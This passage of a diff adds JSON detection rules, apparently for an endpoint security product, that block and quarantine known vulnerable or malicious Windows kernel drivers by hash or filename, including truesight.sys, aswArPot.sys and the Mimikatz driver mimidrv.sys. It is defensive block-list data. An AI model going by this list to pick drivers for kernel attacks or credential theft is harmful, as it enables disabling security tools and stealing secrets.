+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.826639Z",
+ "creation_date": "2026-03-23T11:45:30.826641Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.826646Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4a42fbb4f43ce223f272ab104cb4548d65b51370e7e3309bbecf94f78f388d0d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6ab2c510-a228-5c45-9d53-5558473c722e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.604071Z",
+ "creation_date": "2026-03-23T11:45:29.604073Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.604079Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8be482157bdb504cc35f1126e31f240e0faf6890790c65c58ec3328f58c780d8",
+ "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6ab3aa6a-a9f1-5cd2-beef-4bdb06dc2ea0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.832902Z",
+ "creation_date": "2026-03-23T11:45:30.832905Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.832913Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "17af7d992ea688cb58092a9cb4e97242dee798b6b8598df58919bd816a487f72",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6abe76f7-30e2-5058-9049-75c7645e33a3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.979567Z",
+ "creation_date": "2026-03-23T11:45:29.979569Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.979575Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e307ebe2d43cc8e290e5ade032a6e38bc6961439f92d6e99b954bf1368a975ef",
+ "comment": "Malicious Kernel Driver (aka windbg.sys) [https://www.loldrivers.io/drivers/da7314dc-6cf1-4d74-a0d1-796fc08944f8/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6ac353ef-113a-5248-aa3e-db023b0e14b4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.491195Z",
+ "creation_date": "2026-03-23T11:45:31.491198Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.491206Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "aa5453e36a0bb0cef26d3708ef568443e42bfe2780db5bc2ac9f8e0dacf35243",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6ac6cbb3-b6cd-5fe3-b382-efd22faf55e2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.492701Z",
+ "creation_date": "2026-03-23T11:45:31.492705Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.492714Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "965428e52c4c1cb355cbac05e8dd5549fa46e71d10d7c8766e2603df5ac048d4",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6acaf915-d2be-5af7-9ac0-ad0b2b9137f3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.149396Z",
+ "creation_date": "2026-03-23T11:45:31.149399Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.149408Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "96145b53c3844ec1ddc23fb0ef29cb17e297a0bdec6215d5f4d62ebda5e62a6b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6ae23888-b7cf-5232-a08a-ece352b71c8c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.971176Z",
+ "creation_date": "2026-03-23T11:45:29.971179Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.971187Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "filename",
+ "value": "mimidrv.sys",
+ "comment": "Mimikatz kernel driver (aka mimidrv.sys) [https://github.com/gentilkiwi/mimikatz] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6aed2c9c-f9c0-5a13-8631-0a0902f6da1e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.833372Z",
+ "creation_date": "2026-03-23T11:45:30.833376Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.833384Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "48b6357abca6278706e2c431fd1cc34a2ab7971b65e496cf19f164a602838a34",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6af166f6-b9f4-547e-8d45-e6831447f86c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.494083Z",
+ "creation_date": "2026-03-23T11:45:31.494086Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.494095Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c78e942bbdff760ab41f3266bc593114e35a15d3f46b5de370a21f2c3ea4e5b0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6b0cbdc8-a97b-5df4-95ec-48dca8cb3c73",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.144939Z",
+ "creation_date": "2026-03-23T11:45:32.144941Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.144946Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d1598c68202647a9d029b0abb2737f3701359ab433677b51bd83459de7155677",
+ "comment": "Malicious Kernel Driver (aka driver_290bc782.sys) [https://www.loldrivers.io/drivers/f5c1a46f-21e6-4b06-b212-2dc55b699497/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6b0f6788-686d-55dd-982a-84b9f2cc1f01",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.457393Z",
+ "creation_date": "2026-03-23T11:45:30.457397Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.457405Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8ef59605ebb2cb259f19aba1a8c122629c224c58e603f270eaa72f516277620c",
+ "comment": "Vulnerable Kernel Driver (aka rtkio64.sys ) [https://www.loldrivers.io/drivers/8d3f27bd-c3fd-48d0-913a-e2caa6fbd025/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6b12aa25-1b3f-5956-8b57-7e1d8ad018e0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.968987Z",
+ "creation_date": "2026-03-23T11:45:29.968989Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.968995Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8cfd5b2102fbc77018c7fe6019ec15f07da497f6d73c32a31f4ba07e67ec85d9",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6b17b320-4771-523e-ae8a-b69080f409e2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.614579Z",
+ "creation_date": "2026-03-23T11:45:29.614581Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.614587Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "56a3c9ac137d862a85b4004f043d46542a1b61c6acb438098a9640469e2d80e7",
+ "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6b1eedb3-df77-5a25-91b6-90a19bf2d768",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.967148Z",
+ "creation_date": "2026-03-23T11:45:29.967151Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.967160Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "15cf3ce2a0ee32488de26222492842a378d6b8af6924578b35dac89fb0c7cb5c",
+ "comment": "PassMark vulnerable driver (aka DirectIo32.sys and DirectIo64.sys) [CVE-2020-15479] [https://github.com/eset/vulnerability-disclosures/blob/master/CVE-2020-15479/CVE-2020-15479.md] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6b27bb1d-47f9-5210-a780-c005f61d445c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.483372Z",
+ "creation_date": "2026-03-23T11:45:31.483376Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.483386Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9f5e3fb2163d42e5c48164c02eda6e3da31c42d054f4103cea2f1c0da445d843",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6b294ad6-d7b5-5293-b497-fc6da62d6048",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.618202Z",
+ "creation_date": "2026-03-23T11:45:29.618204Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.618209Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "835733590a778f48dae1df4e33da8455b89449fed3e04fa19b64bbdcb6a530db",
+ "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6b2af974-52f1-570a-bcae-a6d2e57afe0a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.819324Z",
+ "creation_date": "2026-03-23T11:45:30.819326Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.819331Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "39b8c4549fcf28f4b5d8aee04bf170f648272197a631c3487a34fdb8d4a826b6",
+ "comment": "Vulnerable Kernel Driver (aka hwdetectng.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6b386362-a615-5dc2-94ca-e74e89620d75",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.973269Z",
+ "creation_date": "2026-03-23T11:45:29.973271Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.973277Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c1bbe628f79528417ea741dfad2f589fc4e5c62152e632a89ed080da029d5384",
+ "comment": "Elaborate Bytes vulnerable driver (aka ElbyCDIO.sys) [CVE-2009-0824] [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6b3bb91b-dd74-5605-9ca2-cf34e93456a9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.475444Z",
+ "creation_date": "2026-03-23T11:45:31.475447Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.475457Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e1335392b288a7006aa03d289559998f8870b9bdca139e12e3f7c5a1c14b8304",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6b4021dc-d69f-5e00-97e4-0e582ffa8778",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.809026Z",
+ "creation_date": "2026-03-23T11:45:31.809028Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.809034Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "93710294ca4c54305bbd016842276f32b8895002c6c2ff09e653ceb3bc05dec0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6b43793f-c824-5758-a3fc-74a4e77739c9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.827699Z",
+ "creation_date": "2026-03-23T11:45:30.827701Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.827706Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cc5df3459b53df65b45eaf3541723192563133f9d07f4aee68c21556d5ac4bb9",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6b5c7d85-f321-5794-91c0-530f342867ed",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.822106Z",
+ "creation_date": "2026-03-23T11:45:31.822109Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.822117Z",
+ "rule_level": null,
